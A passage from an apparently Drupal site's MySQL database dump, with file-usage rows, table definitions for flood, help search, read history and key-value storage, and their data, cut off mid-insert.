(279, 'editor', 'node', '23', 4),
(280, 'editor', 'node', '23', 4),
(281, 'editor', 'node', '23', 4),
(282, 'editor', 'node', '23', 4),
(284, 'editor', 'node', '23', 3),
(285, 'editor', 'node', '23', 3),
(286, 'editor', 'node', '23', 3),
(287, 'editor', 'node', '23', 3),
(288, 'editor', 'node', '23', 2),
(289, 'editor', 'node', '23', 2),
(290, 'editor', 'node', '23', 2),
(291, 'editor', 'node', '23', 3),
(292, 'editor', 'node', '23', 3),
(293, 'editor', 'node', '23', 3),
(294, 'editor', 'node', '23', 3),
(295, 'editor', 'node', '23', 2),
(296, 'editor', 'node', '23', 2),
(297, 'editor', 'node', '23', 2),
(298, 'editor', 'node', '23', 3),
(299, 'editor', 'node', '23', 3),
(300, 'editor', 'node', '23', 3),
(301, 'editor', 'node', '23', 3),
(302, 'editor', 'node', '23', 2),
(303, 'editor', 'node', '23', 2),
(304, 'editor', 'node', '23', 2),
(306, 'editor', 'node', '23', 1),
(307, 'editor', 'node', '23', 1),
(308, 'editor', 'node', '23', 1),
(309, 'editor', 'node', '23', 1),
(310, 'editor', 'node', '23', 1),
(311, 'editor', 'node', '23', 1),
(312, 'editor', 'node', '23', 1),
(313, 'editor', 'node', '23', 1),
(314, 'editor', 'node', '23', 1),
(315, 'editor', 'node', '23', 1),
(316, 'editor', 'node', '23', 1),
(317, 'editor', 'node', '23', 1),
(318, 'editor', 'node', '23', 1),
(319, 'editor', 'node', '23', 1),
(320, 'editor', 'node', '23', 1),
(321, 'editor', 'node', '23', 1),
(322, 'editor', 'node', '23', 1),
(323, 'editor', 'node', '23', 1),
(324, 'editor', 'node', '23', 1),
(325, 'editor', 'node', '23', 1),
(326, 'editor', 'node', '23', 1),
(327, 'editor', 'node', '23', 1),
(328, 'editor', 'node', '23', 1),
(329, 'editor', 'node', '23', 1),
(331, 'editor', 'node', '62', 3),
(332, 'editor', 'node', '62', 3),
(333, 'editor', 'node', '62', 3),
(334, 'editor', 'node', '62', 3),
(337, 'editor', 'node', '24', 1),
(338, 'editor', 'node', '24', 1),
(339, 'editor', 'node', '24', 1),
(341, 'file', 'node', '63', 1),
(343, 'editor', 'node', '66', 2),
(344, 'editor', 'node', '66', 2),
(346, 'editor', 'node', '67', 2),
(347, 'editor', 'node', '67', 2),
(348, 'editor', 'node', '67', 2),
(349, 'editor', 'node', '67', 2),
(350, 'editor', 'node', '67', 2),
(351, 'editor', 'node', '67', 2),
(352, 'editor', 'node', '67', 2),
(353, 'editor', 'node', '67', 2),
(354, 'editor', 'node', '67', 2),
(355, 'editor', 'node', '67', 2),
(356, 'editor', 'node', '67', 2),
(358, 'editor', 'node', '68', 3),
(359, 'editor', 'node', '68', 3),
(360, 'editor', 'node', '68', 3),
(361, 'file', 'node', '68', 2),
(370, 'editor', 'node', '69', 2),
(371, 'editor', 'node', '69', 2),
(372, 'editor', 'node', '69', 2),
(373, 'editor', 'node', '69', 2),
(374, 'editor', 'node', '69', 2),
(375, 'editor', 'node', '69', 2),
(376, 'editor', 'node', '69', 2),
(378, 'editor', 'node', '70', 2),
(379, 'file', 'node', '70', 3),
(380, 'editor', 'node', '71', 3),
(381, 'file', 'node', '71', 4),
(382, 'file', 'node', '72', 5),
(384, 'editor', 'node', '73', 2),
(386, 'editor', 'node', '73', 2),
(387, 'editor', 'node', '73', 2),
(388, 'file', 'node', '73', 3),
(389, 'file', 'node', '74', 5),
(390, 'file', 'node', '75', 11),
(391, 'editor', 'node', '76', 2),
(392, 'editor', 'node', '76', 2),
(393, 'editor', 'node', '76', 2),
(394, 'editor', 'node', '76', 2),
(395, 'file', 'node', '76', 3),
(396, 'editor', 'node', '77', 2),
(397, 'editor', 'node', '77', 2),
(398, 'editor', 'node', '77', 2),
(399, 'editor', 'node', '77', 2),
(400, 'file', 'node', '77', 3),
(401, 'editor', 'node', '78', 2),
(402, 'editor', 'node', '78', 2),
(403, 'editor', 'node', '78', 2),
(404, 'editor', 'node', '78', 2),
(405, 'editor', 'node', '78', 2),
(406, 'editor', 'node', '78', 2),
(407, 'file', 'node', '78', 3),
(408, 'editor', 'node', '79', 1),
(409, 'editor', 'node', '79', 1),
(410, 'editor', 'node', '79', 1),
(411, 'editor', 'node', '79', 1),
(412, 'file', 'node', '79', 1),
(413, 'editor', 'node', '80', 2),
(414, 'editor', 'node', '80', 2),
(415, 'editor', 'node', '80', 2),
(416, 'editor', 'node', '80', 2),
(417, 'file', 'node', '80', 3),
(418, 'editor', 'node', '81', 2),
(419, 'file', 'node', '81', 3),
(420, 'file', 'node', '82', 3),
(421, 'editor', 'node', '83', 2),
(422, 'editor', 'node', '83', 2),
(423, 'file', 'node', '83', 3),
(424, 'file', 'node', '84', 3),
(425, 'editor', 'node', '85', 2),
(426, 'file', 'node', '85', 3),
(427, 'file', 'node', '86', 3),
(428, 'file', 'node', '88', 3),
(429, 'editor', 'node', '88', 2),
(430, 'editor', 'node', '88', 2),
(431, 'editor', 'node', '89', 2),
(432, 'file', 'node', '89', 3),
(433, 'file', 'node', '90', 6),
(434, 'editor', 'node', '91', 2),
(435, 'editor', 'node', '91', 2),
(436, 'editor', 'node', '91', 2),
(437, 'file', 'node', '91', 3),
(438, 'editor', 'node', '92', 2),
(439, 'editor', 'node', '92', 2),
(440, 'file', 'node', '92', 3),
(441, 'editor', 'node', '93', 2),
(442, 'editor', 'node', '93', 2),
(443, 'editor', 'node', '93', 2),
(444, 'file', 'node', '93', 3),
(445, 'editor', 'node', '94', 1),
(446, 'editor', 'node', '94', 1),
(447, 'file', 'node', '94', 1),
(448, 'editor', 'node', '95', 3),
(449, 'editor', 'node', '95', 3),
(450, 'editor', 'node', '95', 3),
(451, 'editor', 'node', '95', 3),
(452, 'editor', 'node', '95', 3),
(453, 'editor', 'node', '95', 3),
(454, 'editor', 'node', '95', 3),
(455, 'editor', 'node', '95', 3),
(456, 'editor', 'node', '95', 3),
(457, 'editor', 'node', '95', 3),
(458, 'editor', 'node', '95', 3),
(459, 'editor', 'node', '95', 3),
(460, 'editor', 'node', '95', 3),
(461, 'editor', 'node', '95', 3),
(462, 'editor', 'node', '95', 3),
(463, 'editor', 'node', '95', 3),
(464, 'editor', 'node', '95', 3),
(465, 'editor', 'node', '95', 3),
(466, 'file', 'node', '95', 5),
(467, 'editor', 'node', '96', 2),
(468, 'editor', 'node', '96', 2),
(469, 'file', 'node', '96', 3),
(470, 'file', 'node', '97', 3),
(471, 'editor', 'node', '98', 2),
(472, 'editor', 'node', '98', 2),
(473, 'editor', 'node', '98', 2),
(474, 'editor', 'node', '98', 2),
(475, 'editor', 'node', '98', 2),
(476, 'editor', 'node', '98', 2),
(477, 'editor', 'node', '98', 2),
(478, 'editor', 'node', '98', 2),
(479, 'editor', 'node', '98', 2),
(480, 'editor', 'node', '98', 2),
(481, 'editor', 'node', '98', 2),
(482, 'editor', 'node', '98', 2),
(483, 'editor', 'node', '98', 2),
(484, 'editor', 'node', '98', 2),
(485, 'editor', 'node', '98', 2),
(486, 'editor', 'node', '98', 2),
(487, 'editor', 'node', '98', 2),
(488, 'editor', 'node', '98', 2),
(489, 'editor', 'node', '98', 2),
(490, 'editor', 'node', '98', 2),
(491, 'file', 'node', '98', 3),
(492, 'file', 'node', '99', 3),
(493, 'editor', 'node', '99', 2),
(494, 'editor', 'node', '99', 2),
(495, 'editor', 'node', '100', 2),
(496, 'file', 'node', '100', 3),
(497, 'editor', 'node', '101', 2),
(498, 'file', 'node', '101', 3),
(499, 'editor', 'node', '102', 2),
(500, 'editor', 'node', '103', 2),
(501, 'editor', 'node', '103', 2),
(502, 'editor', 'node', '103', 2),
(503, 'editor', 'node', '103', 2),
(504, 'editor', 'node', '103', 2),
(505, 'editor', 'node', '103', 2),
(506, 'editor', 'node', '103', 2),
(507, 'file', 'node', '102', 3),
(508, 'file', 'node', '103', 3),
(509, 'editor', 'node', '103', 2),
(510, 'editor', 'node', '104', 2),
(511, 'file', 'node', '104', 3),
(512, 'file', 'node', '105', 3),
(513, 'editor', 'node', '105', 1),
(514, 'editor', 'node', '105', 1),
(515, 'editor', 'node', '105', 1),
(516, 'editor', 'node', '105', 1),
(517, 'editor', 'node', '106', 2),
(518, 'file', 'node', '106', 3),
(519, 'editor', 'node', '107', 2),
(520, 'file', 'node', '107', 3),
(521, 'editor', 'node', '108', 2),
(522, 'editor', 'node', '108', 2),
(523, 'editor', 'node', '108', 2),
(524, 'editor', 'node', '108', 2),
(525, 'editor', 'node', '108', 2),
(526, 'editor', 'node', '108', 2),
(527, 'editor', 'node', '108', 2),
(528, 'file', 'node', '108', 3),
(529, 'editor', 'node', '109', 2),
(530, 'file', 'node', '109', 3),
(531, 'editor', 'node', '110', 2),
(532, 'file', 'node', '110', 3),
(533, 'editor', 'node', '111', 2),
(534, 'editor', 'node', '111', 2),
(535, 'editor', 'node', '111', 2),
(536, 'editor', 'node', '111', 2),
(537, 'editor', 'node', '111', 2),
(538, 'file', 'node', '111', 3),
(539, 'editor', 'node', '112', 2),
(540, 'editor', 'node', '112', 2),
(541, 'file', 'node', '112', 2),
(542, 'editor', 'node', '113', 2),
(543, 'editor', 'node', '113', 2),
(544, 'editor', 'node', '113', 2),
(545, 'editor', 'node', '113', 2),
(546, 'file', 'node', '113', 3),
(547, 'editor', 'node', '114', 2),
(548, 'editor', 'node', '114', 2),
(549, 'file', 'node', '114', 3),
(550, 'editor', 'node', '115', 2),
(551, 'editor', 'node', '115', 2),
(552, 'editor', 'node', '115', 2),
(553, 'editor', 'node', '115', 2),
(554, 'file', 'node', '115', 3),
(555, 'editor', 'node', '116', 2),
(556, 'editor', 'node', '116', 2),
(557, 'editor', 'node', '116', 2),
(558, 'editor', 'node', '116', 2),
(559, 'editor', 'node', '116', 2),
(560, 'editor', 'node', '116', 2),
(561, 'editor', 'node', '116', 2),
(562, 'editor', 'node', '116', 2),
(563, 'file', 'node', '116', 3),
(564, 'editor', 'node', '117', 2),
(565, 'file', 'node', '117', 3),
(566, 'editor', 'node', '118', 2),
(567, 'file', 'node', '118', 3),
(568, 'editor', 'node', '119', 3),
(569, 'file', 'node', '119', 2),
(570, 'editor', 'node', '120', 2),
(571, 'editor', 'node', '120', 2),
(572, 'editor', 'node', '120', 2),
(573, 'editor', 'node', '120', 2),
(574, 'editor', 'node', '120', 2),
(575, 'editor', 'node', '120', 2),
(576, 'editor', 'node', '120', 2),
(577, 'editor', 'node', '120', 2),
(578, 'editor', 'node', '120', 2),
(579, 'editor', 'node', '120', 2),
(580, 'editor', 'node', '120', 2),
(581, 'editor', 'node', '120', 2),
(582, 'editor', 'node', '120', 2),
(583, 'editor', 'node', '120', 2),
(584, 'editor', 'node', '120', 2),
(585, 'editor', 'node', '120', 2),
(586, 'editor', 'node', '120', 2),
(587, 'file', 'node', '120', 3),
(588, 'editor', 'node', '121', 2),
(589, 'editor', 'node', '121', 2),
(590, 'file', 'node', '121', 3),
(591, 'editor', 'node', '122', 2),
(592, 'editor', 'node', '122', 2),
(593, 'editor', 'node', '122', 2),
(594, 'editor', 'node', '122', 2),
(595, 'editor', 'node', '122', 2),
(596, 'editor', 'node', '122', 2),
(597, 'editor', 'node', '122', 2),
(598, 'editor', 'node', '122', 2),
(599, 'file', 'node', '122', 3),
(600, 'editor', 'node', '123', 2),
(601, 'editor', 'node', '123', 2),
(602, 'file', 'node', '123', 3),
(603, 'editor', 'node', '124', 2),
(604, 'file', 'node', '124', 3),
(605, 'editor', 'node', '125', 2),
(606, 'editor', 'node', '125', 2),
(607, 'file', 'node', '125', 3),
(608, 'editor', 'node', '126', 2),
(609, 'editor', 'node', '126', 2),
(610, 'editor', 'node', '126', 2),
(611, 'file', 'node', '126', 3),
(612, 'editor', 'node', '127', 2),
(613, 'editor', 'node', '127', 2),
(614, 'editor', 'node', '127', 2),
(615, 'file', 'node', '127', 3),
(616, 'editor', 'node', '128', 2),
(617, 'editor', 'node', '128', 2),
(618, 'editor', 'node', '128', 2),
(619, 'editor', 'node', '128', 2),
(620, 'file', 'node', '128', 3),
(621, 'editor', 'node', '129', 2),
(622, 'editor', 'node', '129', 2),
(623, 'editor', 'node', '129', 2),
(624, 'file', 'node', '129', 3),
(625, 'editor', 'node', '130', 2),
(626, 'editor', 'node', '130', 2),
(627, 'editor', 'node', '130', 2),
(628, 'editor', 'node', '130', 2),
(629, 'editor', 'node', '130', 2),
(630, 'editor', 'node', '130', 2),
(631, 'file', 'node', '130', 3),
(632, 'editor', 'node', '131', 2),
(633, 'file', 'node', '131', 3),
(656, 'editor', 'node', '132', 2),
(657, 'editor', 'node', '132', 2),
(658, 'file', 'node', '132', 3),
(659, 'editor', 'node', '133', 2),
(660, 'editor', 'node', '133', 2),
(661, 'editor', 'node', '133', 2),
(662, 'editor', 'node', '133', 2),
(663, 'editor', 'node', '133', 2),
(664, 'editor', 'node', '133', 2),
(665, 'editor', 'node', '133', 2),
(666, 'editor', 'node', '133', 2),
(667, 'editor', 'node', '133', 2),
(669, 'file', 'node', '133', 3),
(670, 'editor', 'node', '134', 2),
(671, 'editor', 'node', '134', 2),
(672, 'editor', 'node', '134', 2),
(673, 'editor', 'node', '134', 2),
(676, 'editor', 'node', '134', 2),
(677, 'editor', 'node', '134', 2),
(679, 'editor', 'node', '134', 2),
(680, 'file', 'node', '134', 3),
(681, 'editor', 'node', '135', 2),
(682, 'editor', 'node', '135', 2),
(683, 'editor', 'node', '135', 2),
(684, 'editor', 'node', '135', 2),
(685, 'editor', 'node', '135', 2),
(686, 'editor', 'node', '135', 2),
(687, 'editor', 'node', '135', 2),
(688, 'editor', 'node', '135', 2),
(689, 'editor', 'node', '135', 2),
(690, 'file', 'node', '135', 3),
(691, 'editor', 'node', '136', 2),
(692, 'editor', 'node', '136', 2),
(693, 'editor', 'node', '136', 2),
(694, 'editor', 'node', '136', 2),
(695, 'editor', 'node', '136', 2),
(696, 'editor', 'node', '136', 2),
(697, 'editor', 'node', '136', 2),
(698, 'editor', 'node', '136', 2),
(699, 'file', 'node', '136', 3),
(700, 'editor', 'node', '137', 2),
(701, 'editor', 'node', '137', 2),
(702, 'editor', 'node', '137', 2),
(703, 'file', 'node', '137', 3),
(704, 'editor', 'node', '138', 2),
(705, 'editor', 'node', '138', 2),
(706, 'editor', 'node', '138', 2),
(707, 'editor', 'node', '138', 2),
(708, 'editor', 'node', '138', 2),
(709, 'editor', 'node', '138', 2),
(710, 'editor', 'node', '138', 2),
(711, 'editor', 'node', '138', 2),
(712, 'file', 'node', '138', 3),
(713, 'editor', 'node', '139', 2),
(714, 'editor', 'node', '139', 2),
(715, 'file', 'node', '139', 3),
(716, 'editor', 'node', '140', 2),
(717, 'editor', 'node', '140', 2),
(718, 'editor', 'node', '140', 2),
(719, 'editor', 'node', '140', 2),
(720, 'editor', 'node', '140', 2),
(721, 'editor', 'node', '140', 2),
(722, 'editor', 'node', '140', 2),
(723, 'file', 'node', '140', 3),
(724, 'editor', 'node', '141', 2),
(725, 'editor', 'node', '141', 2),
(726, 'editor', 'node', '141', 2),
(727, 'file', 'node', '141', 3),
(728, 'editor', 'node', '142', 2),
(729, 'editor', 'node', '142', 2),
(730, 'editor', 'node', '142', 2),
(731, 'editor', 'node', '142', 2),
(732, 'editor', 'node', '142', 2),
(733, 'file', 'node', '142', 3),
(734, 'editor', 'node', '143', 2),
(735, 'editor', 'node', '143', 2),
(736, 'file', 'node', '143', 3),
(737, 'editor', 'node', '144', 2),
(738, 'editor', 'node', '144', 2),
(739, 'editor', 'node', '144', 2),
(740, 'file', 'node', '144', 2),
(741, 'editor', 'node', '145', 2),
(742, 'file', 'node', '145', 3),
(743, 'editor', 'node', '146', 4),
(744, 'editor', 'node', '146', 4),
(745, 'editor', 'node', '146', 4),
(746, 'editor', 'node', '146', 4),
(747, 'editor', 'node', '146', 4),
(748, 'file', 'node', '146', 7),
(758, 'editor', 'node', '147', 2),
(759, 'file', 'node', '147', 3),
(760, 'editor', 'node', '148', 2),
(761, 'file', 'node', '148', 3),
(763, 'editor', 'node', '149', 1),
(764, 'editor', 'node', '149', 1),
(765, 'file', 'node', '149', 1),
(766, 'editor', 'node', '150', 2),
(767, 'editor', 'node', '150', 2),
(768, 'editor', 'node', '150', 2),
(769, 'editor', 'node', '150', 2),
(770, 'editor', 'node', '150', 2),
(771, 'editor', 'node', '150', 2),
(772, 'editor', 'node', '150', 2),
(773, 'editor', 'node', '150', 2),
(774, 'file', 'node', '150', 3),
(775, 'editor', 'node', '151', 2),
(776, 'file', 'node', '151', 3),
(778, 'file', 'node', '152', 3),
(779, 'editor', 'node', '153', 2),
(780, 'editor', 'node', '153', 2),
(781, 'editor', 'node', '153', 2),
(782, 'editor', 'node', '153', 2),
(783, 'editor', 'node', '153', 2),
(784, 'editor', 'node', '153', 2),
(785, 'file', 'node', '153', 3),
(790, 'file', 'node', '154', 5),
(791, 'editor', 'node', '155', 1),
(792, 'editor', 'node', '155', 1),
(793, 'editor', 'node', '155', 1),
(794, 'editor', 'node', '155', 1),
(795, 'file', 'node', '156', 3),
(796, 'file', 'node', '157', 3),
(797, 'editor', 'node', '157', 2),
(798, 'editor', 'node', '157', 2),
(799, 'editor', 'node', '157', 2),
(800, 'editor', 'node', '157', 2),
(803, 'editor', 'node', '160', 3),
(804, 'editor', 'node', '161', 5),
(805, 'editor', 'node', '162', 2),
(806, 'editor', 'node', '163', 2),
(807, 'file', 'node', '164', 3),
(808, 'editor', 'node', '164', 2),
(809, 'file', 'node', '165', 3),
(810, 'editor', 'node', '165', 2),
(811, 'editor', 'node', '165', 2),
(813, 'editor', 'node', '165', 2),
(814, 'editor', 'node', '165', 2),
(815, 'editor', 'node', '165', 2),
(816, 'file', 'node', '166', 2),
(817, 'file', 'node', '167', 3),
(818, 'editor', 'node', '167', 2),
(819, 'file', 'node', '168', 3),
(820, 'file', 'node', '169', 3),
(821, 'editor', 'node', '169', 2),
(822, 'file', 'node', '170', 3),
(823, 'editor', 'node', '171', 2),
(824, 'editor', 'node', '171', 2),
(825, 'file', 'node', '171', 3),
(830, 'file', 'node', '173', 3),
(831, 'editor', 'node', '173', 2),
(832, 'editor', 'node', '173', 2),
(833, 'editor', 'node', '173', 2),
(834, 'file', 'node', '174', 3),
(835, 'editor', 'node', '174', 2),
(836, 'editor', 'node', '174', 2),
(837, 'file', 'node', '175', 3),
(838, 'editor', 'node', '175', 2),
(839, 'editor', 'node', '175', 2),
(840, 'file', 'node', '176', 3),
(841, 'editor', 'node', '176', 2),
(842, 'editor', 'node', '176', 2),
(843, 'file', 'node', '177', 3),
(844, 'editor', 'node', '177', 2),
(845, 'editor', 'node', '177', 2),
(846, 'file', 'node', '161', 6),
(847, 'file', 'node', '160', 2),
(848, 'file', 'node', '178', 3),
(849, 'file', 'node', '179', 3),
(850, 'file', 'node', '180', 2),
(851, 'file', 'node', '181', 3),
(852, 'file', 'node', '182', 3),
(853, 'file', 'node', '183', 3),
(854, 'file', 'node', '184', 3),
(855, 'file', 'node', '185', 4),
(856, 'file', 'node', '186', 3),
(857, 'file', 'node', '187', 3),
(858, 'file', 'node', '189', 3),
(859, 'file', 'node', '190', 5),
(860, 'file', 'node', '191', 3),
(861, 'file', 'node', '192', 3),
(862, 'file', 'node', '193', 2),
(863, 'file', 'node', '195', 3),
(864, 'file', 'node', '196', 3),
(865, 'file', 'node', '197', 3),
(866, 'file', 'node', '198', 3),
(867, 'file', 'node', '199', 3),
(868, 'file', 'node', '200', 3),
(879, 'file', 'node', '204', 3),
(880, 'file', 'node', '205', 3),
(881, 'file', 'node', '206', 1);

-- --------------------------------------------------------

--
-- Table structure for table `flood`
--

CREATE TABLE `flood` (
  `fid` int NOT NULL COMMENT 'Unique flood event ID.',
  `event` varchar(64) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'Name of event (e.g. contact).',
  `identifier` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'Identifier of the visitor, such as an IP address or hostname.',
  `timestamp` bigint NOT NULL DEFAULT '0' COMMENT 'Timestamp of the event.',
  `expiration` bigint NOT NULL DEFAULT '0' COMMENT 'Expiration timestamp. Expired events are purged on cron run.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Flood controls the threshold of events, such as the number…';

-- --------------------------------------------------------

--
-- Table structure for table `help_search_items`
--

CREATE TABLE `help_search_items` (
  `sid` int UNSIGNED NOT NULL COMMENT 'Numeric index of this item in the search index',
  `section_plugin_id` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The help section the item comes from',
  `permission` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The permission needed to view this item',
  `topic_id` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The topic ID of the item'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='Stores information about indexed help search items';

--
-- Dumping data for table `help_search_items`
--

INSERT INTO `help_search_items` (`sid`, `section_plugin_id`, `permission`, `topic_id`) VALUES
(1, 'help_topics', '', 'block.configure'),
(2, 'help_topics', '', 'block.overview'),
(3, 'help_topics', '', 'block.place'),
(4, 'help_topics', '', 'block_content.add'),
(5, 'help_topics', '', 'block_content.type'),
(6, 'help_topics', '', 'breakpoint.overview'),
(7, 'help_topics', '', 'comment.configuring'),
(8, 'help_topics', '', 'comment.creating_type'),
(9, 'help_topics', '', 'comment.disabling'),
(10, 'help_topics', '', 'comment.moderating'),
(11, 'help_topics', '', 'comment.overview'),
(12, 'help_topics', '', 'config.export_full'),
(13, 'help_topics', '', 'config.export_single'),
(14, 'help_topics', '', 'config.import_full'),
(15, 'help_topics', '', 'config.import_single'),
(16, 'help_topics', '', 'config_translation.overview'),
(17, 'help_topics', '', 'contact.adding_fields'),
(18, 'help_topics', '', 'contact.configuring_personal'),
(19, 'help_topics', '', 'contact.creating'),
(20, 'help_topics', '', 'contact.overview'),
(21, 'help_topics', '', 'contact.setting_default'),
(22, 'help_topics', '', 'contextual.overview'),
(23, 'help_topics', '', 'editor.overview'),
(24, 'help_topics', '', 'field_ui.add_field'),
(25, 'help_topics', '', 'field_ui.manage_display'),
(26, 'help_topics', '', 'field_ui.manage_form'),
(27, 'help_topics', '', 'field_ui.reference_field'),
(28, 'help_topics', '', 'filter.overview'),
(29, 'help_topics', '', 'core.appearance'),
(30, 'help_topics', '', 'core.config_overview'),
(31, 'help_topics', '', 'core.content_structure'),
(32, 'help_topics', '', 'core.cron'),
(33, 'help_topics', '', 'core.extending'),
(34, 'help_topics', '', 'core.maintenance'),
(35, 'help_topics', '', 'core.media'),
(36, 'help_topics', '', 'core.menus'),
(37, 'help_topics', '', 'core.performance'),
(38, 'help_topics', '', 'core.security'),
(39, 'help_topics', '', 'core.settings_tray'),
(40, 'help_topics', '', 'core.tracking_content'),
(41, 'help_topics', '', 'core.translations'),
(42, 'help_topics', '', 'core.ui_accessibility'),
(43, 'help_topics', '', 'core.ui_components'),
(44, 'help_topics', '', 'core.web_services'),
(45, 'help_topics', '', 'help.help_topic_search'),
(46, 'help_topics', '', 'help.overview'),
(47, 'help_topics', '', 'history.tracking_user_content'),
(48, 'help_topics', '', 'image.style'),
(49, 'help_topics', '', 'language.add'),
(50, 'help_topics', '', 'language.detect'),
(51, 'help_topics', '', 'locale.import'),
(52, 'help_topics', '', 'locale.translate_strings'),
(53, 'help_topics', '', 'locale.translation_status'),
(54, 'help_topics', '', 'media.media_type'),
(55, 'help_topics', '', 'menu_ui.content_type_configuration'),
(56, 'help_topics', '', 'menu_ui.menu_item_add'),
(57, 'help_topics', '', 'menu_ui.menu_operations'),
(58, 'help_topics', '', 'menu_ui.overriding'),
(59, 'help_topics', '', 'node.creating_content'),
(60, 'help_topics', '', 'node.creating_type'),
(61, 'help_topics', '', 'node.editing'),
(62, 'help_topics', '', 'node.overview'),
(63, 'help_topics', '', 'path.creating_alias'),
(64, 'help_topics', '', 'path.editing_alias'),
(65, 'help_topics', '', 'path.overview'),
(66, 'help_topics', '', 'search.configuring'),
(67, 'help_topics', '', 'search.index'),
(68, 'help_topics', '', 'search.overview'),
(69, 'help_topics', '', 'shortcut.overview'),
(70, 'help_topics', '', 'system.cache'),
(71, 'help_topics', '', 'system.config_basic'),
(72, 'help_topics', '', 'system.config_error'),
(73, 'help_topics', '', 'system.maintenance_mode'),
(74, 'help_topics', '', 'system.module_install'),
(75, 'help_topics', '', 'system.module_uninstall'),
(76, 'help_topics', '', 'system.reports'),
(77, 'help_topics', '', 'system.theme_install'),
(78, 'help_topics', '', 'system.theme_uninstall'),
(79, 'help_topics', '', 'taxonomy.configuring'),
(80, 'help_topics', '', 'taxonomy.overview'),
(81, 'help_topics', '', 'tour.overview'),
(82, 'help_topics', '', 'user.create'),
(83, 'help_topics', '', 'user.new_role'),
(84, 'help_topics', '', 'user.overview'),
(85, 'help_topics', '', 'user.permissions'),
(86, 'help_topics', '', 'user.security_account_settings'),
(87, 'help_topics', '', 'user.update'),
(88, 'help_topics', '', 'views_ui.add_display'),
(89, 'help_topics', '', 'views_ui.bulk_operations'),
(90, 'help_topics', '', 'views_ui.create'),
(91, 'help_topics', '', 'views_ui.edit'),
(92, 'help_topics', '', 'content_translation.overview'),
(93, 'help_topics', '', 'views.overview');

-- --------------------------------------------------------

--
-- Table structure for table `history`
--

CREATE TABLE `history` (
  `uid` int NOT NULL DEFAULT '0' COMMENT 'The "users".uid that read the "node" nid.',
  `nid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The "node".nid that was read.',
  `timestamp` bigint NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp at which the read occurred.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='A record of which "users" have read which "node"s.';

--
-- Dumping data for table `history`
--

INSERT INTO `history` (`uid`, `nid`, `timestamp`) VALUES
(1, 154, 1786174447),
(1, 162, 1786177002),
(1, 164, 1786618193),
(1, 167, 1786175309),
(1, 171, 1786175468),
(1, 199, 1786701411),
(1, 200, 1786701461),
(2, 154, 1787922792),
(2, 168, 1787837974),
(2, 204, 1787922847),
(2, 205, 1787752654),
(2, 206, 1787838836);

-- --------------------------------------------------------

--
-- Table structure for table `key_value`
--

CREATE TABLE `key_value` (
  `collection` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'A named collection of key and value pairs.',
  `name` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The key of the key-value pair. As KEY is a SQL reserved keyword, name was chosen instead.',
  `value` longblob NOT NULL COMMENT 'The value.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Generic key-value storage table. See the state system for…';

--
-- Dumping data for table `key_value`
--

INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('config.entity.key_store.action', 'uuid:0e4d4cf8-a9a1-4915-9abc-2af98c3c485d', 0x613a313a7b693a303b733a33343a2273797374656d2e616374696f6e2e6d656469615f7075626c6973685f616374696f6e223b7d),
('config.entity.key_store.action', 'uuid:14e1d690-fa95-4049-ad59-9c5202faf055', 0x613a313a7b693a303b733a33393a2273797374656d2e616374696f6e2e6e6f64655f6d616b655f756e737469636b795f616374696f6e223b7d),
('config.entity.key_store.action', 'uuid:225f8c52-65a2-441e-af90-78aa71115740', 0x613a313a7b693a303b733a33333a2273797374656d2e616374696f6e2e636f6d6d656e745f736176655f616374696f6e223b7d),
('config.entity.key_store.action', 'uuid:3ba8259e-8b46-4da8-b4c0-ad0bf3635930', 0x613a313a7b693a303b733a33353a2273797374656d2e616374696f6e2e6e6f64655f756e70726f6d6f74655f616374696f6e223b7d),
('config.entity.key_store.action', 'uuid:4367dbe7-07d4-4cbb-9e7a-f854bec9af7d', 0x613a313a7b693a303b733a33323a2273797374656d2e616374696f6e2e6e6f64655f64656c6574655f616374696f6e223b7d),
('config.entity.key_store.action', 'uuid:44f31ca9-559b-468f-b85f-5d062ef4661a', 0x613a313a7b693a303b733a33373a2273797374656d2e616374696f6e2e6e6f64655f6d616b655f737469636b795f616374696f6e223b7d),
('config.entity.key_store.action', 'uuid:483a48dd-e6ef-42a3-ae30-5aa53208ea85', 0x613a313a7b693a303b733a33363a2273797374656d2e616374696f6e2e757365725f626c6f636b5f757365725f616374696f6e223b7d),
('config.entity.key_store.action', 'uuid:49758d81-3937-4094-8f1e-b1151aa40acf', 0x613a313a7b693a303b733a34303a2273797374656d2e616374696f6e2e706174686175746f5f7570646174655f616c6961735f6e6f6465223b7d),
('config.entity.key_store.action', 'uuid:53c1e05b-4fbb-4650-aa7a-4d5a9f14ae1f', 0x613a313a7b693a303b733a33303a2273797374656d2e616374696f6e2e6e6f64655f736176655f616374696f6e223b7d),
('config.entity.key_store.action', 'uuid:54497b46-a9cb-4d8e-b3ba-ae0482577e1b', 0x613a313a7b693a303b733a33383a2273797374656d2e616374696f6e2e757365725f756e626c6f636b5f757365725f616374696f6e223b7d),
('config.entity.key_store.action', 'uuid:56b0ffaa-32e4-49bb-92e8-8060fe9718a9', 0x613a313a7b693a303b733a35313a2273797374656d2e616374696f6e2e757365725f72656d6f76655f726f6c655f616374696f6e2e61646d696e6973747261746f72223b7d),
('config.entity.key_store.action', 'uuid:6bdc7ac7-337c-414f-8142-4db3a2efb05b', 0x613a313a7b693a303b733a34383a2273797374656d2e616374696f6e2e757365725f6164645f726f6c655f616374696f6e2e61646d696e6973747261746f72223b7d),
